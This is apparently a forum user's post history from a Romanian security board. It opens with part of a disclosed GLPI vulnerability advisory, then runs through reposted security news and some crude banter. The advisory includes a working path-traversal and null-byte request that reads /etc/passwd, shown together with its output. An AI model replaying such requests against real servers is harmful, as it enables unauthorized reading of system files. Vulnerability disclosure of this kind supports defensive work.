license tracking and software auditing. Desc: GLPI suffers from a file inclusion vulnerability (LFI) when input passed thru the 'filetype' parameter to 'common.tabs.php' script is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes. ======================================================================== /ajax/common.tabs.php: ---------------------- 46: if (!isset($_REQUEST['itemtype']) || empty($_REQUEST['itemtype'])) { 47: exit(); 62: $item = new $_REQUEST['itemtype'])(); ======================================================================== Tested on: Microsoft Windows 7 Ultimate SP1 (EN) - Apache/2.4.3, PHP/5.4.7 Linux CentOS 6.0 (Final) - Apache/2.2.15, PHP/5.3.3 Vulnerabilities discovered by Humberto Cabrera @dniz0r Zero Science Lab - http://www.zeroscience.mk Advisory ID: ZSL-2013-5145 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5145.php 09.05.2013 --- POST /glpi/ajax/common.tabs.php?_dc=1371234969991 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://localhost/glpi/front/user.form.php?id=2 Content-Length: 75 Cookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache target=/glpi/front/user.form.php&itemtype=../../../../../../../../../../../../../../../../etc/passwd%00User&glpi_tab=Profile_User$1&id=2 --- root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync .. ..
  10. Matt
    Uitati ce raspuns am primit cand i-am zis unuia ca asta cu vivaSMS e un mare cacat. Nume : intra pe linkul de pe youtube, afla si comenteaza dupa. nu, du-te si sapa, intoarce-te si zi-mi cat ai castigat;) )
  11. Matt
    Un fost responsabil Facebook, responsabil cu securitatea informatica a retelei sociale si insarcinat, de asemenea, cu protectia datelor personale, a fost angajat in 2010 de Agentia nationala de securitate a SUA (NSA), aflat la originea faimosului program de spionaj PRISM. Este vorba de Max Kelly, iar informatia a fost furnizata de New York Times, care a publicat un articol privind legaturile dintre NSA si Silicon Valley. Potrivit publicatiei, agentia americana face frecvent „cumparaturi” in Silicon Valley, pentru a investi in tehnologii de ultima ora si pentru a atrage in randurile sale cele mai stralucite minti in domeniul analizei datelor, scrie incomemagazine.ro. De altfel, explica publicatia, NSA este unul dintre cei mai mari clienti ai intreprinderilor specializate in datamining si al Big Date, unde agentiile guvernamentale nu ezita sa investeasca prin intermediul unui fond de investitii condus de un fost director NSA. Sursa Realitatea.net
  12. Matt
    Atunci cand copiezi o stie postezi si sursa.
  13. Matt
    https://rstforums.com/forum/16767-hellsoft-ro.rst
  14. Matt
    In ultimele zile aveti numai idei geniale.Veniti in pula mea cu ceva productiv.
  15. Matt
    Am o idee. https://rstforums.com/forum/70964-postarile-de-la-cos-n-au-ce-cauta-pe-homepage.rst Sau poti posta pe filelist la Sectiunea Lifestyles and Stupid Questions / TPU. RST = FORUM DE SECURITATE IN PULA MEA NU DE INTALNIRI ROMANTICE !
  16. Matt
    My opinion.
  17. Matt
    Este prima data cand Microsoft anunta o "vanatoare de recompense", metoda la care au apelat, in trecut, Google si Facebook. A inceput vanatoarea de buguri pentru utilizatorii sistemului de operare Windows, care doresc sa isi instaleze versiunea Windows 8.1 Preview, care va fi disponibila incepand din 26 iunie. Microsoft n-a mai organizat, pana acum, astfel de actiuni. Ele sunt insa o practica destul de des intalnita in industrie, scrie theverge. Compania Microsoft ofera pana la 100 de mii de dolari atat pentru probleme majore descoperite de useri, cat si pentru "vulnerabilitati critice" la Internet Explorer 11 Preview si idei privind metode prin care compania se poate proteja de posibile atacuri. Astfel de premii oferite de Microsoft cresc calitatea softurilor produse de companie si le fac mai sigure pe acestea in eventualitatea unor atacuri informatice. Companiile mari prefera sa plateasca specialistii in securitate si hackerii nu doar pentru a avea un soft mai sigur, ci si pentru a evita ca problemele descoperite de ei sa fie vandute pe piata neagra. Sursa Yoda.Ro
  18. Matt
    Fujitsu hmm.. 1 GB Ram , camera 13 Megapixel , sounds good .. but Android SUCKS !!!!!!!!!!!!!!!
  19. Matt
    Sa fi sigur ca SUA e cu mult peste China.Sa fi sigur ca si China si America au supercomputere mult mai puternice decat acestea oficiale.Tot ce apare in presa , apare pentru ca asta vor ei sa stim noi , e doar de ochii lumii.Americanii au ajuns in punctul de a avea "ferme umane" dar apoi niste supercomputere.
  20. Matt
    Tianhe-2, cel mai nou supercomputer chinezesc, are o viteza de doua ori mai mare decat Titan, concurentul sau american. 33.860 de trilioane de calcule pe secunda poate face Tianhe-2 (Calea Lactee 2), supercalculatorul construit de National University of Defence Technology din China. Un computer obisnuit poate face 100 de milioane de calcule pe secunda, ceea ce inseamna ca Tianhe-2 este mai rapid decat 338 de milioane de calculatoare obisnuite la un loc. Conform specialistilor, cele 33.860 de trilioane de calcule pe secunda s-ar traduce in limbaj cinernetic in 33,86 de petaflop/secunda, aproape dublu fata de cel mai puternic supercomputer american. Titan, detinut de US Department of Energy reuseste doar 17,59 de petaflop/secunda. Chinezii nu sperau ca Tianhe-2 va fi functional pana in 2015, intrarea lui in exploatare urmand sa aiba loc cat mai curand la National Supercomputer Centre din Guangzhou, in slujba cercetarii si educatiei. Iata clasamentul celor mai puternice supercomputere din lume: 1. Tianhe-2 - China 2. Titan - Statele Unite 3. Sequoia - Statele Unite 4. K computer - Japonia 5. Mira - Statele Unite 6. Stampede - Statele Unite 7. Juqueen - Germania 8. Vulcan - Statele Unite 9. SuperMuc - Germania 10. Tianhe-1A - China Sursa Yoda.Ro
  21. Matt
    Companiile se bazeaza din ce in ce mai mult pe informatia sub forma electronica. Evolutia tehnologica aduce cu sine o serie de oportunitati. Unul dintre cele mai mari avantaje prezentate de „era tehnologiei informatiei” consta in eliminarea, intr-o mai mica sau mai mare masura, a necesitatii si constrangerilor implicate de workflow-ul „traditional”, bazat pe documente, artefacte si componente „concrete”, fizice. Eliminarea acestor constrangeri implica „tranzitia” de la forma fizica la forma digitala, electronica. Odata cu aceasta tranzitie, cu aceasta schimbare de paradigma, se deplaseaza si accentul de pe „aspectele traditionale”. Asadar, focusul cade din ce in ce mai mult pe forma digitala si pe modalitatile de realizare si implementare a solutiilor ce depind si lucreaza cu informatiile aflate in aceasta forma. Adaptarea la „era IT” Pe masura ce balanta datelor inclina din ce in ce mai mult in directia digitala, nevoia de solutii devine evidenta. Ca orice alt domeniu, IT-ul prezinta avantaje si dezavantaje. In cazul domeniului in discutie, cateva aspecte ce se prezinta a fi mai „problematice” sunt reprezentate de siguranta si integritatea datelor si securitatea sistemelor informatice. Asadar, atentia corespunzatoare trebuie acordata nu numai imbunatatirilor, eficientizarii proceselor si avantajelor aduse de noile tehnologii, ci si „consecintelor”. De exemplu, implementarea unei solutii de backup si recuperare a datelor poate asigura evitarea situatiilor dificile, oferind un mijloc sigur de persistare a datelor. Neimplementarea corecta poate aduce cu sine pierderea informatiilor sau stocarea acestora intr-o forma inconsistenta. Symantec – solutii backup si recuperare de calitate O gama de solutii ale companiei Symantec sunt dedicate aspectelor de backup si recuperare a datelor. Solutiile companiei (nu numai din domeniul backup-ului si recuperarii datelor) sunt cunoscute pentru gradul ridicat de calitate. Asadar, Symantec pune la dispozitie soft-uri precum Backup Exec, solutie dedicata backup-ului si recuperarii datelor, NetBackup, o solutie performanta si sigura, compatibila cu o gama larga de sisteme de operare si configuratii hardware, extrem de usor de integrat, Storage Foundation, solutie dedicata ce pune la dispozitie un sistem centralizat de lucru cu storage-ul si multe altele. Cursurile BrainConcert si modalitatile sigure de backup BrainConcert pune la dispozitia companiilor si celor interesati de implementarea solutiilor Symantec o modalitate facila de familiarizare cu tehnologiile din domeniu ale companiei. Aceste cursuri se adreseaza administratorilor de sistem, specialistilor si membrilor echipelor IT insarcinati cu backup-ul si recuperarea datelor. Tinand cont de natura sensibila a domeniului – backup-ul si recuperarea datelor fiind un proces extrem de important, ce trebuie sa se desfasoare intr-o maniera corecta, pentru a asigura integritatea datelor – cursurile BrainConcert acopera aspectele ce se pot dovedi problematice, punand la dispozitie o abordare atat tehnica cat si practica. BrainConcert ofera, pe langa aceste cursuri, analiza si consultanta gratuita pentru stabilirea nevoilor de training ale companiei. Pentru mai multe detalii vizualizati oferta de training BrainConcert pentru companii. Despre Brain Concert BrainConcert organizeaza cursuri de pregatire profesionala in domeniul IT atat in sediul propriu cat si in cadrul companiilor contractante. Cu o platforma interactiva proiectata exclusiv pentru cursanti, eficienta si personalizata, care imbina aprofundarea teoretica cu aplicarea practica pentru a crea ansamblul ideal de formare profesionala. Sursa: Comunicate de presa
  22. Matt
    Hewlett-Packard si Samsung Electronics se vor asigura, acum, ca PC-urile lor din China sunt instalate cu software Windows si Office cu licenta, ca parte a noilor acorduri semnate cu Microsoft in vederea combaterii pirateriei. Microsoft a anuntat miercuri acordurile incheiate cu cele doua companii, in cadrul celei mai recente campanii anti-piraterie, desfasurata in orasul chinez Nanjing. Incepand cu luna decembrie, campania Microsoft "Keep it Real" a educat publicul chinez cu privire la riscurile de securitate pe care le impica software-ul Windows fara licenta. In plus, compania a avertizat zeci de distribuitori de PC-uri din China sa inceteze sa mai tranzactioneze copii piratate ale produselor sale software. Acordurile anuntate de catre Microsoft stabilesc in sarcina celor doua companii sa solicite, la randul lor, de la partenerii directi, sa promoveze software-ul Microsoft autentic. In luna martie, Microsoft a semnat un acord similar cu Lenovo, cel mai mare producator chinez de PC-uri. La acea vreme, Microsoft declara ca acordul va contribu la limitarea si prevenirea instalarii pe PC-uri a versiunilor piratate ale Windows. Mare parte din software-ul bootleg care ajunge pe Pc-uri rezulta din instalarea de catre producatori a unui sistem de operare gratuit non-Windows, inainte ca dispozitivele sa fie livrate, a explicat Nick Psyhogeos, vicepresedinte al grupului de solutii Microsoft OEM. Pentru a pastra costurile scazute, distribuitorii vor instala, la un moment dat, o versiune fara licenta a Windows pe PC-uri, inainte ca acestea sa fie puse in vanzare. Microsoft se lupta cu pirateria in China de ani de zile. In 2011, China a fost a doua tara, dupa SUA, cu cele mai mari valori comerciale ale pirateriei software, evaluata la suma de 8,9 miliarde dolari, potrivit unui studiu Business Software Alliance. China reprezinta acum cea mai mare piata PC din luma, iar valoarea pirateriei software in aceasta tara este de asteptat sa depaseasca in curand valoarea din SUA. Microsoft a studiat recent 221 de PC-uri cumparate in China si pe care erau instalate versiuni fara licenta ale Windows. Compania a constatat ca, de multe ori, aceste PC-uri contin amenintari de securitate. Astfel, din cele 221 de PC-uri, 54% contineau malware, in timp ce firewall-urile a 56% dintre acestea prezentau defectiuni. Sursa: Computerworld - IT news, features, blogs, tech reviews, career advice
  23. Matt
    Va prezentam de curand noul produs de securitate gratuit 360 Internet Security 2013. Foloseste motorul BitDefender, alaturi de alte 2 motoare de scanare “in the cloud”. Este realizat de Qihu, China si pare un produs promitator. O prima remarca: denumirea de Internet Security nu este cea mai fericita, produsul nu ofera decat antivirus si atat. Dupa instalare, care decurge rapid, faceti cunostinta cu interfata grafica: simpla si usor de inteles. Are un consum de resurse scazut, de maxim 20-30 MB RAM, prin cele doua procese: 360Tray.exe si 360sd.exe. Ofera functii avansate de monitorizare antivirus in timp real, scanare web, protectie USB, functie anti-keylogger si protectie a camerei web, alaturi de detectie comportamentala (Proactive Defense). Produsul este configurabil si ofera chiar si optiunea de a alege tu ce sa faci cand este detectat un virus la scanarea in timp real (functie lipsa in produsele BitDefender). Protectia oferita este una de top si pe un set de 20 de website-uri infectate, accesate in Google Chrome a blocat cu succes 19. In acest proces am vazut la lucru atat motorul BitDefender, cat si motoarele euristice, dar si scutul comportamental, care a detectat activitate potential periculoasa la unul din virusii ratati prin semnaturi. In ceea ce priveste detectia pe un set mai mare de virusi din luna iunie a.c. aceasta solutie de securitate a detectat 5301 din 6200 mostre malware. Produsul 360 Internet Security 2013 ne-a lasat o impresie pozitiva in aceasta evaluare si il recomandam pentru a va proteja sistemul impotriva virusilor. Il puteti descarca folosind link-urile urmatoare: 360 Internet Security 2013 v4.1.0.4031 (32-bit) – 360 Internet Security 2013 (32-bit) - CNET Download.com 360 Internet Security 2013 v4.1.0.4031 (64-bit) – 360 Internet Security 2013 (64-bit) - CNET Download.com Sursa FaraVirusi.Com
  24. Matt
    Neglijenta angajatilor constituie o amenintare serioasa la adresa sigurantei informatiilor confidentiale ale companiilor, declara peste jumatate dintre respondentii studiului Worldwide Security Products, in cadrul caruia IDC a intervievat mai multe corporatii la nivel global, pe parcursul lunii februarie 2013. Companiile au identificat acest aspect ca fiind o prioritate in 2013 si intentioneaza sa dezvolte si sa implementeze regulamente pentru a se asigura ca angajatii au o atitudine responsabila in ceea ce priveste datele confidentiale. „Este esential ca toti angajatii, indiferent de statutul lor in companie, sa inteleaga felul in care actiunile lor gresite (nevinovate sau neintentionate) pot afecta organizatia”, a declarat Kevin Bailey, Research Director, EMEA Software Security Products and Services Policies in cadrul IDC. „Organizatiile vor avea nevoie de politici sigure si usor de inteles, care sa controleze accesul, mutarea si transmiterea datelor in siguranta.”, a completat Bailey. In general, respectarea politicilor de securitate pentru informatiile confidentiale este asigurata in companii de catre departamentul juridic si de catre serviciile de securitate, care trebuie sa dezvolte, sa implementeze si sa monitorizeze impreuna conformarea la aceste reguli. Insa, chiar si atunci cand o companie stabileste politicile potrivite, exista intotdeauna riscul de a pierde informatii din cauza unor erori umane – neglijenta angajatilor sau lipsa de informare. Aceasta chestiune este confirmata in mod indirect si de alte date colectate in cadrul aceluiasi studiu IDC: pe langa recunoasterea nevoii de implementare a politicilor de securitate, aproximativ 36% dintre companii se declara foarte ingrijorate cu privire la numarul tot mai mare de clienti mobili si dispozitive necontrolate, precum smartphone-urile, tabletele si laptopurile. Prevenirea scurgerilor de informatii confidentiale reprezinta o preocupare pentru 41% dintre companiile intervievate. Desi pe piata exista numeroase solutii si tehnologii menite sa asigure protectia informatiilor, platforma Kaspersky Endpoint Security for Business, care administreaza protectia coordonata a infrastructurii companiei impotriva fisierelor malware, asigura securitatea optima pentru informatiile delicate si previne eficient scurgerile de informatii. Secretele raman secrete cu ajutorul tehnologiilor de protectie a informatiilor de la Kaspersky Lab Politicile companiei pentru protectia informatiilor sensibile sunt cel mai adesea incalcate atunci cand angajatii folosesc propriile dispozitive mobile pentru activitati de serviciu. Aceste dispozitive devin adesea un vehicul prin care informatiile confidentiale parasesc compania fara permisiune. De asemenea, dispozitivele portabile pot introduce in sistemul acesteia programe malitioase, care, dupa ce patrund in reteaua companiei, pot duce la scurgeri de informatii sau pot avea alte consecinte chiar mai grave. Kaspersky Endpoint Security for Business integreaza mai multe tehnologii avansate menite sa protejeze informatiile companiei. In primul rand, asigura doua nivele de criptare a fisierelor – File/Folder Level Encryption si Full Disk Encryption. Cu ajutorul consolei de administrare Kaspersky Security Center, administratorul retelei poate stabili reguli pentru criptarea anumitor tipuri de fisiere conform standardelor industriei, astfel incat informatiile sa nu poata fi citite in afara infrastructurii IT a companiei. Informatiile delicate nu pot fi vazute, indiferent daca cel care incalca politica de securitate a companiei este cineva din interiorul firmei sau daca informatiile au fost scoase in afara companiei in mod accidental. Dispozitivele portabile detinute de angajati pot introduce fisiere malware in reteaua companiei, care pot permite apoi infractorilor cibernetici sa obtina acces de la distanta pentru a sustrage date confidentiale. Instrumentele Kaspersky Lab reduc riscurile ca asemenea scenarii sa devina realitate. Acestea includ tehnologii precum Automatic Exploit Prevention, Anti-rootkit si Dynamic Whitelisting, care combat eficient chiar si amenintarile necunoscute. Smartphone-ul pierdut nu presupune pierderea datelor Tendinta in continua crestere de a folosi dispozitivele mobile personale pentru activitati de serviciu vine in contradictie cu principiile de protejare a informatiilor delicate. Aceste dispozitive sunt nu doar mai predispuse la infectii cu spyware, ci sunt implicate in fiecare an in incidente ce implica scurgeri de informatii confidentiale, in urma pierderii smartphone-urilor sau a tabletelor care contin date confidentiale ale companiilor. Disponibil ca produs de sine statator sau ca parte a solutiei Kaspersky Endpoint Security for Business, Kaspersky Security for Mobile cuprinde o lista extinsa de functii care permit integrarea rapida si facila a dispozitivelor personale ale angajatilor in infrastructura IT a companiei. Solutia asigura, in special, posibilitatea de a cripta informatiile delicate si de a le sterge de la distanta din dispozitiv, chiar daca smartphone-ul furat este folosit cu o noua cartela SIM. Indiferent cat de stricte sunt politicile de securitate ale unei companii cu privire la informatiile delicate, intotdeauna exista posibilitatea ca acestea sa fie incalcate din cauza actiunilor angajatilor. Kaspersky Endpoint Security for Business dispune de tehnologiile necesare pentru a neutraliza sau a minimiza consecintele negative ale unor astfel de incidente. Sursa FaraVirusi.Com
  25. Matt
    Dupa cum a fost mania aflarii persoanelor care iti viziteaza profilul, ne aflam in fata altui val de spam. Este o noua gaselnita pe Facebook, si se raspandeste sub forma unor mesaje care prind la public. Oricine ar dori sa aiba mai multe “Like-uri” pentru pagina personala sau mai multi “Abonati” la feed-ul prorpiu. Mesajul propagat pe peretele victimei, dar si in grupurile pe care le frecventeaza este : Wanna Get Free Friends Requests / subscribers ? Follow steps on video =>http://www.youtube.com/watch?v=CT6jDrsKm9Y Accesand acel clip pe YouTube, aveti urmatoarea descriere: Link : Fast add system , Please Don’t use this system more than 1 time per hour Enjoy Dand click ajungeti pe pagina Fast add system, cu mesajul: “Does it work for you? you like it still works and get new members with us, please (like + positive COMMENT) on the video Here“. Urmand instructiunile, nu faceti decat sa acordati acces la profilul vostru de Facebook atacatorilor, care vor posta mesajele de mai sus in mod insistent, propagand acest spam. Bineinteles ca nu iti va da nimeni Like-uri suplimentare si nici nu vei avea mai multi abonati. Pentru a scapa de acest spam schimbati-va parola contului Facebook. Sursa FaraVirusi.Com
×
×
  • Create New...